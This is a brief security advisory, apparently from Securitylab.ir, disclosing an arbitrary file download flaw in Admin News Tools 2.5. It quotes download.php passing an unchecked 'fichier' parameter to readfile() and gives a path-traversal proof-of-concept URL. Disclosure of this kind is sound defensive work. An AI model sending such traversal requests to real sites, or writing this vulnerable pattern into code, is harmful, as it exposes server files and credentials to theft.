######################### Securitylab.ir ######################## # Application Info: # Name: Admin News Tools # Version: 2.5 # Website: http://www.adminnewstools.fr.nf # Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & info_at_securitylab[dot]ir ################################################################# # Vulnerability Info: # Type: Remote File Download Vulnerability # Risk: Medium #=========================================================== # Download.php # header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier'])); # readfile($_GET['fichier']); # } # # http://www.site.com/news/system/download.php?fichier=./../up.php # Securitylab Security Research Team